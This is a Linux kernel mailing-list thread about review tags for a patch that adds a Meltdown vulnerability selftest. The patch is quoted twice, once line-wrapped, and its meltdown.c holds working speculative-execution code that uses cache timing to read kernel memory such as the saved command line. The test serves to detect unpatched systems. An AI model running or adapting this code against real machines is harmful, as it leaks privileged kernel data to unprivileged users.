But just in case, the link for Pavel's new reply is here: https://lore.kernel.org/lkml/CABohvEPWBHmrRpZcQejTkZ+CYtYCyu6rFMd4doNn_CMk35...
Now with the original author Pavel Boldin's "LGTM", do you think this patch is OK to you or you still insist something else? Please kindly let me know, thanks.
I do not see any sort of tag sent by Pavel (hint, you can NOT make one up yourself) to indicate that they agree with this.
Also, the amount of gyrations you all went through just to keep an Intel lawyer's name out of the changelog is insane and means that I was right to push for this. I still want it now, just because :)
thanks,
greg k-h
On Thu, 2023-01-19 at 17:12 +0100, Greg KH wrote:
On Wed, Jan 18, 2023 at 01:22:11PM +0800, Aaron Lu wrote:
Hi Greg,
On Mon, Jan 09, 2023 at 03:38:43PM +0800, Aaron Lu wrote:
On Sat, Jan 07, 2023 at 09:18:15AM +0100, Greg KH wrote:
On Fri, Jan 06, 2023 at 09:00:21AM +0800, Aaron Lu wrote:
If you do not trust what I've done is what I've claimed, now the original author Pavel Boldin has given the patch a "LGTM" tag, does that address your concern?
I don't see that anywhere on lore.kernel.org, have a link to it?
It appears Pavel Boldin's last reply didn't make it to lore for some reason but I saw him kindly replying again and I suppose you should have received it.
But just in case, the link for Pavel's new reply is here: https://lore.kernel.org/lkml/CABohvEPWBHmrRpZcQejTkZ+CYtYCyu6rFMd4doNn_CMk35...
Now with the original author Pavel Boldin's "LGTM", do you think this patch is OK to you or you still insist something else? Please kindly let me know, thanks.
I do not see any sort of tag sent by Pavel (hint, you can NOT make one up yourself) to indicate that they agree with this.
Pavel just sent his reviewed-by tag: https://lore.kernel.org/lkml/CABohvEO796aei7YfuLsjQZoermnyB_5Q9YcwT06PAuFdx2...
Thanks, Aaron
Signed-off-by: Aaron Lu aaron.lu@intel.com
Reviewed-by: Pavel Boldin boldin.pavel@gmail.com
-- Sincerely, Pavel Boldin
P.S. Sorry for lagging, electricity & free time are hard to find these days.
diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile index 0388c4d60af0..36f99c360a56 100644 --- a/tools/testing/selftests/x86/Makefile +++ b/tools/testing/selftests/x86/Makefile @@ -13,7 +13,7 @@ CAN_BUILD_WITH_NOPIE := $(shell ./check_cc.sh "$(CC)" trivial_program.c -no-pie) TARGETS_C_BOTHBITS := single_step_syscall sysret_ss_attrs syscall_nt test_mremap_vdso \ check_initial_reg_state sigreturn iopl ioperm \ test_vsyscall mov_ss_trap \
syscall_arg_fault fsgsbase_restore sigaltstack
syscall_arg_fault fsgsbase_restore sigaltstack meltdown
TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \ test_FCMOV test_FCOMI test_FISTTP \ vdso_restorer diff --git a/tools/testing/selftests/x86/meltdown.c b/tools/testing/selftests/x86/meltdown.c new file mode 100644 index 000000000000..fcb211dc9038 --- /dev/null +++ b/tools/testing/selftests/x86/meltdown.c @@ -0,0 +1,529 @@ +// SPDX-License-Identifier: GPL-2.0-or-later +/*
- Copyright (c) 2018 Pavel Boldin pboldin@cloudlinux.com
- */
+#define _GNU_SOURCE +#include <stdio.h> +#include <stdlib.h> +#include <stdint.h> +#include <stdarg.h> +#include <string.h> +#include <signal.h> +#include <ucontext.h> +#include <unistd.h> +#include <fcntl.h> +#include <ctype.h> +#include <sys/utsname.h> +#include <sys/mman.h>
+#define PAGE_SHIFT 12 +#define PAGE_SIZE 0x1000 +#define PUD_SHIFT 30 +#define PUD_SIZE (1UL << PUD_SHIFT) +#define PUD_MASK (~(PUD_SIZE - 1))
+size_t cache_miss_threshold; +unsigned long directmap_base;
+#define TARGET_OFFSET 9 +#define TARGET_SIZE (1 << TARGET_OFFSET) +#define BITS_BY_READ 2
+static inline uint64_t rdtsc(void) +{
uint32_t eax, edx;
uint64_t tsc_val;
/*
* The lfence is to wait (on Intel CPUs) until all previous
* instructions have been executed. If software requires RDTSC to be
* executed prior to execution of any subsequent instruction, it can
* execute LFENCE immediately after RDTSC
* */
__asm__ __volatile__("lfence; rdtsc; lfence" : "=a"(eax), "=d"(edx));
tsc_val = ((uint64_t)edx) << 32 | eax;
return tsc_val;
+}
+static inline void clflush(volatile void *__p) +{
asm volatile("clflush %0" : "+m" (*(volatile char *)__p));
+}
+static char target_array[BITS_BY_READ * TARGET_SIZE];
+static void clflush_target(void) +{
int i;
for (i = 0; i < BITS_BY_READ; i++)
clflush(&target_array[i * TARGET_SIZE]);
+}
+extern char failshere[]; +extern char stopspeculate[];
+static void __attribute__((noinline)) speculate(unsigned long addr, char bit) +{
register char mybit asm ("cl") = bit;
+#ifdef __x86_64__
asm volatile (
"1:\n\t"
".rept 300\n\t"
"add $0x141, %%rax\n\t"
".endr\n"
"failshere:\n\t"
"movb (%[addr]), %%al\n\t"
"ror %[bit], %%rax\n\t"
"and $1, %%rax\n\t"
"shl $9, %%rax\n\t"
"jz 1b\n\t"
"movq (%[target], %%rax, 1), %%rbx\n"
"stopspeculate: \n\t"
"nop\n\t"
:
: [target] "r" (target_array),
[addr] "r" (addr),
[bit] "r" (mybit)
: "rax", "rbx"
);
+#else /* defined(__x86_64__) */
asm volatile (
"1:\n\t"
".rept 300\n\t"
"add $0x141, %%eax\n\t"
".endr\n"
"failshere:\n\t"
"movb (%[addr]), %%al\n\t"
"ror %[bit], %%eax\n\t"
"and $1, %%eax\n\t"
"shl $9, %%eax\n\t"
"jz 1b\n\t"
"movl (%[target], %%eax, 1), %%ebx\n"
"stopspeculate: \n\t"
"nop\n\t"
:
: [target] "r" (target_array),
[addr] "r" (addr),
[bit] "r" (mybit)
: "rax", "ebx"
);
+#endif +}
+#ifdef __i386__ +# define REG_RIP REG_EIP +#endif
+static void sigsegv(int sig, siginfo_t *siginfo, void *context) +{
ucontext_t *ucontext = context;
unsigned long *prip = (unsigned long *)&ucontext->uc_mcontext.gregs[REG_RIP];
if (*prip != (unsigned long)failshere) {
printf("Segmentation fault at unexpected location %lx\n", *prip);
abort();
}
*prip = (unsigned long)stopspeculate;
return;
+}
+static int set_signal(void) +{
struct sigaction act = {
.sa_sigaction = sigsegv,
.sa_flags = SA_SIGINFO,
};
return sigaction(SIGSEGV, &act, NULL);
+}
+static inline int get_access_time(volatile char *addr) +{
unsigned long long time1, time2;
volatile int j __attribute__((__unused__));
time1 = rdtsc();
j = *addr;
time2 = rdtsc();
return time2 - time1;
+}
+static int cache_hit_threshold; +static int hist[BITS_BY_READ];
+static void check(void) +{
int i, time;
volatile char *addr;
for (i = 0; i < BITS_BY_READ; i++) {
addr = &target_array[i * TARGET_SIZE];
time = get_access_time(addr);
if (time <= cache_hit_threshold)
hist[i]++;
}
+}
+#define CYCLES 10000 +static int readbit(int fd, unsigned long addr, char bit) +{
int i, ret;
static char buf[256];
memset(hist, 0, sizeof(hist));
for (i = 0; i < CYCLES; i++) {
/*
* Make the to-be-stolen data cache and tlb hot
* to increase success rate.
*/
ret = pread(fd, buf, sizeof(buf), 0);
if (ret < 0)
printf("[INFO]\tCan't read fd");
clflush_target();
speculate(addr, bit);
check();
}
if (hist[1] > CYCLES / 10)
return 1;
return 0;
+}
+static int readbyte(int fd, unsigned long addr) +{
int bit, res = 0;
for (bit = 0; bit < 8; bit ++ )
res |= (readbit(fd, addr, bit) << bit);
return res;
+}
+static int mysqrt(long val) +{
int root = val / 2, prevroot = 0, i = 0;
while (prevroot != root && i++ < 100) {
prevroot = root;
root = (val / root + root) / 2;
}
return root;
+}
+#define ESTIMATE_CYCLES 1000000 +static void set_cache_hit_threshold(void) +{
long cached, uncached, i;
for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
cached += get_access_time(target_array);
for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
cached += get_access_time(target_array);
for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) {
clflush(target_array);
uncached += get_access_time(target_array);
}
cached /= ESTIMATE_CYCLES;
uncached /= ESTIMATE_CYCLES;
cache_hit_threshold = mysqrt(cached * uncached);
printf("[INFO]\taccess time: cached = %ld, uncached = %ld, threshold = %d\n",
cached, uncached, cache_hit_threshold);
+}
+static unsigned long find_symbol_in_file(const char *filename, const char *symname) +{
unsigned long addr;
char type, *buf;
int found;
FILE *fp;
fp = fopen(filename, "r");
if (!fp) {
printf("[INFO]\tFailed to open %s\n", filename);
return 0;
}
buf = malloc(4096);
if (!buf)
return 0;
found = 0;
while (fscanf(fp, "%lx %c %s\n", &addr, &type, buf)) {
if (!strcmp(buf, symname)) {
found = 1;
break;
}
}
free(buf);
fclose(fp);
return found ? addr : 0;
+}
+static unsigned long find_kernel_symbol(const char *name) +{
char systemmap[256];
struct utsname utsname;
unsigned long addr;
addr = find_symbol_in_file("/proc/kallsyms", name);
if (addr)
return addr;
if (uname(&utsname) < 0)
return 0;
sprintf(systemmap, "/boot/System.map-%s", utsname.release);
addr = find_symbol_in_file(systemmap, name);
return addr;
+}
+static unsigned long saved_cmdline_addr; +static int spec_fd;
+#define READ_SIZE 32
+static int test_read_saved_command_line(void) +{
unsigned int i, score = 0, ret;
unsigned long addr;
unsigned long size;
char read[READ_SIZE] = { 0 };
char expected[READ_SIZE] = { 0 };
int expected_len;
saved_cmdline_addr = find_kernel_symbol("saved_command_line");
if (!saved_cmdline_addr) {
printf("[SKIP]\tCan not find symbol saved_command_line\n");
return 0;
}
printf("[INFO]\tsaved_cmdline_addr: 0x%lx\n", saved_cmdline_addr);
spec_fd = open("/proc/cmdline", O_RDONLY);
if (spec_fd == -1) {
printf("[SKIP]\tCan not open /proc/cmdline\n");
return 0;
}
expected_len = pread(spec_fd, expected, sizeof(expected), 0);
if (expected_len < 0) {
printf("[SKIP]\tCan't read /proc/cmdline\n");
return 0;
}
/* read address of saved_cmdline_addr */
addr = saved_cmdline_addr;
size = sizeof(addr);
for (i = 0; i < size; i++) {
ret = readbyte(spec_fd, addr);
read[i] = ret;
addr++;
}
/* read value pointed to by saved_cmdline_addr */
memcpy(&addr, read, sizeof(addr));
memset(read, 0, sizeof(read));
printf("[INFO]\tsaved_command_line: 0x%lx\n", addr);
size = expected_len;
if (!addr)
goto done;
for (i = 0; i < size; i++) {
ret = readbyte(spec_fd, addr);
read[i] = ret;
addr++;
}
for (i = 0; i < size; i++)
if (expected[i] == read[i])
score++;
+done:
if (score > size / 2) {
printf("[FAIL]\ttest_read_saved_command_line: both high and low kernel mapping leak found.\n");
ret = -1;
} else {
printf("[OK]\ttest_read_saved_command_line: no leak found.\n");
ret = 0;
}
close(spec_fd);
return ret;
+}
+static int get_directmap_base(void) +{
char *buf;
FILE *fp;
size_t n;
int ret;
fp = fopen("/sys/kernel/debug/page_tables/kernel", "r");
if (!fp)
return -1;
buf = NULL;
ret = -1;
while (getline(&buf, &n, fp) != -1) {
if (!strstr(buf, "Kernel Mapping"))
continue;
if (getline(&buf, &n, fp) != -1 &&
sscanf(buf, "0x%lx", &directmap_base) == 1) {
printf("[INFO]\tdirectmap_base=0x%lx/0x%lx\n", directmap_base, directmap_base & PUD_MASK);
directmap_base &= PUD_MASK;
ret = 0;
break;
}
}
fclose(fp);
free(buf);
return ret;
+}
+static int virt_to_phys(unsigned long virt, unsigned long *phys) +{
unsigned long pfn;
uint64_t val;
int fd, ret;
fd = open("/proc/self/pagemap", O_RDONLY);
if (fd == -1) {
printf("[INFO]\tFailed to open pagemap\n");
return -1;
}
ret = pread(fd, &val, sizeof(val), (virt >> PAGE_SHIFT) * sizeof(uint64_t));
if (ret == -1) {
printf("[INFO]\tFailed to read pagemap\n");
goto out;
}
if (!(val & (1ULL << 63))) {
printf("[INFO]\tPage not present according to pagemap\n");
ret = -1;
goto out;
}
pfn = val & ((1ULL << 55) - 1);
if (pfn == 0) {
printf("[INFO]\tNeed CAP_SYS_ADMIN to show pfn\n");
ret = -1;
goto out;
}
ret = 0;
*phys = (pfn << PAGE_SHIFT) | (virt & (PAGE_SIZE - 1));
+out:
close(fd);
return ret;
+}
+static int test_read_local_var(void) +{
char path[] = "/tmp/meltdown.XXXXXX";
char string[] = "test string";
unsigned long phys;
int i, len, ret;
char *result;
void *p;
if (get_directmap_base() == -1) {
printf("[SKIP]\tFailed to get directmap base. Need root and CONFIG_PTDUMP_DEBUGFS\n");
return 0;
}
spec_fd = mkstemp(path);
if (spec_fd == -1) {
printf("[SKIP]\tCan not open %s\n", path);
return 0;
}
ftruncate(spec_fd, 0x1000);
p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, spec_fd, 0);
if (p == MAP_FAILED) {
printf("[SKIP]\tmmap spec_fd failed\n");
return 0;
}
memcpy(p, string, sizeof(string));
if (virt_to_phys((unsigned long)p, &phys) == -1) {
printf("[SKIP]\tCan not convert virtual address to physical address\n");
return 0;
}
len = strlen(string);
result = malloc(len + 1);
if (!result) {
printf("[SKIP]\tNot enough memory for malloc\n");
return 0;
}
memset(result, 0, len + 1);
for (i = 0; i < len; i++, phys++) {
result[i] = readbyte(spec_fd, directmap_base + phys);
if (result[i] == 0)
break;
}
ret = !strncmp(string, result, len);
if (ret)
printf("[FAIL]\ttest_read_local_var: low kernel mapping leak found.\n");
else
printf("[OK]\ttest_read_local_var: no leak found.\n");
free(result);
munmap(p, 0x1000);
close(spec_fd);
return ret;
+}
+int main(void) +{
int ret1, ret2;
printf("[RUN]\tTest if system is vulnerable to meltdown\n");
set_cache_hit_threshold();
memset(target_array, 1, sizeof(target_array));
if (set_signal() < 0) {
printf("[SKIP]\tCan not set handler for segfault\n");
return 0;
}
ret1 = test_read_local_var();
ret2 = test_read_saved_command_line();
if (ret1 || ret2)
return -1;
return 0;
+}
2.39.0
On Thu, 2023-01-19 at 19:15 +0200, Pavel Boldin wrote:
Signed-off-by: Aaron Lu aaron.lu@intel.com
Reviewed-by: Pavel Boldin boldin.pavel@gmail.com
Thanks!
-- Sincerely, Pavel Boldin
P.S. Sorry for lagging, electricity & free time are hard to find these days.
Never mind, appreciate your time to review this patch.
Best Regards, Aaron
diff --git a/tools/testing/selftests/x86/Makefile b/tools/testing/selftests/x86/Makefile index 0388c4d60af0..36f99c360a56 100644 --- a/tools/testing/selftests/x86/Makefile +++ b/tools/testing/selftests/x86/Makefile @@ -13,7 +13,7 @@ CAN_BUILD_WITH_NOPIE := $(shell ./check_cc.sh "$(CC)" trivial_program.c -no-pie) TARGETS_C_BOTHBITS := single_step_syscall sysret_ss_attrs syscall_nt test_mremap_vdso \ check_initial_reg_state sigreturn iopl ioperm \ test_vsyscall mov_ss_trap \
syscall_arg_fault fsgsbase_restore
sigaltstack
syscall_arg_fault fsgsbase_restore
sigaltstack meltdown TARGETS_C_32BIT_ONLY := entry_from_vm86 test_syscall_vdso unwind_vdso \ test_FCMOV test_FCOMI test_FISTTP \ vdso_restorer diff --git a/tools/testing/selftests/x86/meltdown.c b/tools/testing/selftests/x86/meltdown.c new file mode 100644 index 000000000000..fcb211dc9038 --- /dev/null +++ b/tools/testing/selftests/x86/meltdown.c @@ -0,0 +1,529 @@ +// SPDX-License-Identifier: GPL-2.0-or-later +/*
- Copyright (c) 2018 Pavel Boldin pboldin@cloudlinux.com
https://github.com/linux-test-project/ltp/blob/master/testcases/cve/meltdown...
- */
+#define _GNU_SOURCE +#include <stdio.h> +#include <stdlib.h> +#include <stdint.h> +#include <stdarg.h> +#include <string.h> +#include <signal.h> +#include <ucontext.h> +#include <unistd.h> +#include <fcntl.h> +#include <ctype.h> +#include <sys/utsname.h> +#include <sys/mman.h>
+#define PAGE_SHIFT 12 +#define PAGE_SIZE 0x1000 +#define PUD_SHIFT 30 +#define PUD_SIZE (1UL << PUD_SHIFT) +#define PUD_MASK (~(PUD_SIZE - 1))
+size_t cache_miss_threshold; +unsigned long directmap_base;
+#define TARGET_OFFSET 9 +#define TARGET_SIZE (1 << TARGET_OFFSET) +#define BITS_BY_READ 2
+static inline uint64_t rdtsc(void) +{
uint32_t eax, edx;
uint64_t tsc_val;
/*
* The lfence is to wait (on Intel CPUs) until all previous
* instructions have been executed. If software requires
RDTSC to be
* executed prior to execution of any subsequent
instruction, it can
* execute LFENCE immediately after RDTSC
* */
__asm__ __volatile__("lfence; rdtsc; lfence" : "=a"(eax),
"=d"(edx));
tsc_val = ((uint64_t)edx) << 32 | eax;
return tsc_val;
+}
+static inline void clflush(volatile void *__p) +{
asm volatile("clflush %0" : "+m" (*(volatile char *)__p));
+}
+static char target_array[BITS_BY_READ * TARGET_SIZE];
+static void clflush_target(void) +{
int i;
for (i = 0; i < BITS_BY_READ; i++)
clflush(&target_array[i * TARGET_SIZE]);
+}
+extern char failshere[]; +extern char stopspeculate[];
+static void __attribute__((noinline)) speculate(unsigned long addr, char bit) +{
register char mybit asm ("cl") = bit;
+#ifdef __x86_64__
asm volatile (
"1:\n\t"
".rept 300\n\t"
"add $0x141, %%rax\n\t"
".endr\n"
"failshere:\n\t"
"movb (%[addr]), %%al\n\t"
"ror %[bit], %%rax\n\t"
"and $1, %%rax\n\t"
"shl $9, %%rax\n\t"
"jz 1b\n\t"
"movq (%[target], %%rax, 1), %%rbx\n"
"stopspeculate: \n\t"
"nop\n\t"
:
: [target] "r" (target_array),
[addr] "r" (addr),
[bit] "r" (mybit)
: "rax", "rbx"
);
+#else /* defined(__x86_64__) */
asm volatile (
"1:\n\t"
".rept 300\n\t"
"add $0x141, %%eax\n\t"
".endr\n"
"failshere:\n\t"
"movb (%[addr]), %%al\n\t"
"ror %[bit], %%eax\n\t"
"and $1, %%eax\n\t"
"shl $9, %%eax\n\t"
"jz 1b\n\t"
"movl (%[target], %%eax, 1), %%ebx\n"
"stopspeculate: \n\t"
"nop\n\t"
:
: [target] "r" (target_array),
[addr] "r" (addr),
[bit] "r" (mybit)
: "rax", "ebx"
);
+#endif +}
+#ifdef __i386__ +# define REG_RIP REG_EIP +#endif
+static void sigsegv(int sig, siginfo_t *siginfo, void *context) +{
ucontext_t *ucontext = context;
unsigned long *prip = (unsigned long *)&ucontext-
uc_mcontext.gregs[REG_RIP];
if (*prip != (unsigned long)failshere) {
printf("Segmentation fault at unexpected location
%lx\n", *prip);
abort();
}
*prip = (unsigned long)stopspeculate;
return;
+}
+static int set_signal(void) +{
struct sigaction act = {
.sa_sigaction = sigsegv,
.sa_flags = SA_SIGINFO,
};
return sigaction(SIGSEGV, &act, NULL);
+}
+static inline int get_access_time(volatile char *addr) +{
unsigned long long time1, time2;
volatile int j __attribute__((__unused__));
time1 = rdtsc();
j = *addr;
time2 = rdtsc();
return time2 - time1;
+}
+static int cache_hit_threshold; +static int hist[BITS_BY_READ];
+static void check(void) +{
int i, time;
volatile char *addr;
for (i = 0; i < BITS_BY_READ; i++) {
addr = &target_array[i * TARGET_SIZE];
time = get_access_time(addr);
if (time <= cache_hit_threshold)
hist[i]++;
}
+}
+#define CYCLES 10000 +static int readbit(int fd, unsigned long addr, char bit) +{
int i, ret;
static char buf[256];
memset(hist, 0, sizeof(hist));
for (i = 0; i < CYCLES; i++) {
/*
* Make the to-be-stolen data cache and tlb hot
* to increase success rate.
*/
ret = pread(fd, buf, sizeof(buf), 0);
if (ret < 0)
printf("[INFO]\tCan't read fd");
clflush_target();
speculate(addr, bit);
check();
}
if (hist[1] > CYCLES / 10)
return 1;
return 0;
+}
+static int readbyte(int fd, unsigned long addr) +{
int bit, res = 0;
for (bit = 0; bit < 8; bit ++ )
res |= (readbit(fd, addr, bit) << bit);
return res;
+}
+static int mysqrt(long val) +{
int root = val / 2, prevroot = 0, i = 0;
while (prevroot != root && i++ < 100) {
prevroot = root;
root = (val / root + root) / 2;
}
return root;
+}
+#define ESTIMATE_CYCLES 1000000 +static void set_cache_hit_threshold(void) +{
long cached, uncached, i;
for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
cached += get_access_time(target_array);
for (cached = 0, i = 0; i < ESTIMATE_CYCLES; i++)
cached += get_access_time(target_array);
for (uncached = 0, i = 0; i < ESTIMATE_CYCLES; i++) {
clflush(target_array);
uncached += get_access_time(target_array);
}
cached /= ESTIMATE_CYCLES;
uncached /= ESTIMATE_CYCLES;
cache_hit_threshold = mysqrt(cached * uncached);
printf("[INFO]\taccess time: cached = %ld, uncached = %ld,
threshold = %d\n",
cached, uncached, cache_hit_threshold);
+}
+static unsigned long find_symbol_in_file(const char *filename, const char *symname) +{
unsigned long addr;
char type, *buf;
int found;
FILE *fp;
fp = fopen(filename, "r");
if (!fp) {
printf("[INFO]\tFailed to open %s\n", filename);
return 0;
}
buf = malloc(4096);
if (!buf)
return 0;
found = 0;
while (fscanf(fp, "%lx %c %s\n", &addr, &type, buf)) {
if (!strcmp(buf, symname)) {
found = 1;
break;
}
}
free(buf);
fclose(fp);
return found ? addr : 0;
+}
+static unsigned long find_kernel_symbol(const char *name) +{
char systemmap[256];
struct utsname utsname;
unsigned long addr;
addr = find_symbol_in_file("/proc/kallsyms", name);
if (addr)
return addr;
if (uname(&utsname) < 0)
return 0;
sprintf(systemmap, "/boot/System.map-%s", utsname.release);
addr = find_symbol_in_file(systemmap, name);
return addr;
+}
+static unsigned long saved_cmdline_addr; +static int spec_fd;
+#define READ_SIZE 32
+static int test_read_saved_command_line(void) +{
unsigned int i, score = 0, ret;
unsigned long addr;
unsigned long size;
char read[READ_SIZE] = { 0 };
char expected[READ_SIZE] = { 0 };
int expected_len;
saved_cmdline_addr =
find_kernel_symbol("saved_command_line");
if (!saved_cmdline_addr) {
printf("[SKIP]\tCan not find symbol
saved_command_line\n");
return 0;
}
printf("[INFO]\tsaved_cmdline_addr: 0x%lx\n",
saved_cmdline_addr);
spec_fd = open("/proc/cmdline", O_RDONLY);
if (spec_fd == -1) {
printf("[SKIP]\tCan not open /proc/cmdline\n");
return 0;
}
expected_len = pread(spec_fd, expected, sizeof(expected),
0);
if (expected_len < 0) {
printf("[SKIP]\tCan't read /proc/cmdline\n");
return 0;
}
/* read address of saved_cmdline_addr */
addr = saved_cmdline_addr;
size = sizeof(addr);
for (i = 0; i < size; i++) {
ret = readbyte(spec_fd, addr);
read[i] = ret;
addr++;
}
/* read value pointed to by saved_cmdline_addr */
memcpy(&addr, read, sizeof(addr));
memset(read, 0, sizeof(read));
printf("[INFO]\tsaved_command_line: 0x%lx\n", addr);
size = expected_len;
if (!addr)
goto done;
for (i = 0; i < size; i++) {
ret = readbyte(spec_fd, addr);
read[i] = ret;
addr++;
}
for (i = 0; i < size; i++)
if (expected[i] == read[i])
score++;
+done:
if (score > size / 2) {
printf("[FAIL]\ttest_read_saved_command_line: both
high and low kernel mapping leak found.\n");
ret = -1;
} else {
printf("[OK]\ttest_read_saved_command_line: no leak
found.\n");
ret = 0;
}
close(spec_fd);
return ret;
+}
+static int get_directmap_base(void) +{
char *buf;
FILE *fp;
size_t n;
int ret;
fp = fopen("/sys/kernel/debug/page_tables/kernel", "r");
if (!fp)
return -1;
buf = NULL;
ret = -1;
while (getline(&buf, &n, fp) != -1) {
if (!strstr(buf, "Kernel Mapping"))
continue;
if (getline(&buf, &n, fp) != -1 &&
sscanf(buf, "0x%lx", &directmap_base) == 1) {
printf("[INFO]\tdirectmap_base=0x%lx/0x%lx\n", directmap_base, directmap_base & PUD_MASK);
directmap_base &= PUD_MASK;
ret = 0;
break;
}
}
fclose(fp);
free(buf);
return ret;
+}
+static int virt_to_phys(unsigned long virt, unsigned long *phys) +{
unsigned long pfn;
uint64_t val;
int fd, ret;
fd = open("/proc/self/pagemap", O_RDONLY);
if (fd == -1) {
printf("[INFO]\tFailed to open pagemap\n");
return -1;
}
ret = pread(fd, &val, sizeof(val), (virt >> PAGE_SHIFT) *
sizeof(uint64_t));
if (ret == -1) {
printf("[INFO]\tFailed to read pagemap\n");
goto out;
}
if (!(val & (1ULL << 63))) {
printf("[INFO]\tPage not present according to
pagemap\n");
ret = -1;
goto out;
}
pfn = val & ((1ULL << 55) - 1);
if (pfn == 0) {
printf("[INFO]\tNeed CAP_SYS_ADMIN to show pfn\n");
ret = -1;
goto out;
}
ret = 0;
*phys = (pfn << PAGE_SHIFT) | (virt & (PAGE_SIZE - 1));
+out:
close(fd);
return ret;
+}
+static int test_read_local_var(void) +{
char path[] = "/tmp/meltdown.XXXXXX";
char string[] = "test string";
unsigned long phys;
int i, len, ret;
char *result;
void *p;
if (get_directmap_base() == -1) {
printf("[SKIP]\tFailed to get directmap base. Need
root and CONFIG_PTDUMP_DEBUGFS\n");
return 0;
}
spec_fd = mkstemp(path);
if (spec_fd == -1) {
printf("[SKIP]\tCan not open %s\n", path);
return 0;
}
ftruncate(spec_fd, 0x1000);
p = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED,
spec_fd, 0);
if (p == MAP_FAILED) {
printf("[SKIP]\tmmap spec_fd failed\n");
return 0;
}
memcpy(p, string, sizeof(string));
if (virt_to_phys((unsigned long)p, &phys) == -1) {
printf("[SKIP]\tCan not convert virtual address to
physical address\n");
return 0;
}
len = strlen(string);
result = malloc(len + 1);
if (!result) {
printf("[SKIP]\tNot enough memory for malloc\n");
return 0;
}
memset(result, 0, len + 1);
for (i = 0; i < len; i++, phys++) {
result[i] = readbyte(spec_fd, directmap_base +
phys);
if (result[i] == 0)
break;
}
ret = !strncmp(string, result, len);
if (ret)
printf("[FAIL]\ttest_read_local_var: low kernel
mapping leak found.\n");
else
printf("[OK]\ttest_read_local_var: no leak
found.\n");
free(result);
munmap(p, 0x1000);
close(spec_fd);
return ret;
+}
+int main(void) +{
int ret1, ret2;
printf("[RUN]\tTest if system is vulnerable to
meltdown\n");
set_cache_hit_threshold();
memset(target_array, 1, sizeof(target_array));
if (set_signal() < 0) {
printf("[SKIP]\tCan not set handler for
segfault\n");
return 0;
}
ret1 = test_read_local_var();
ret2 = test_read_saved_command_line();
if (ret1 || ret2)
return -1;
return 0;
+}
2.39.0
linux-kselftest-mirror@lists.linaro.org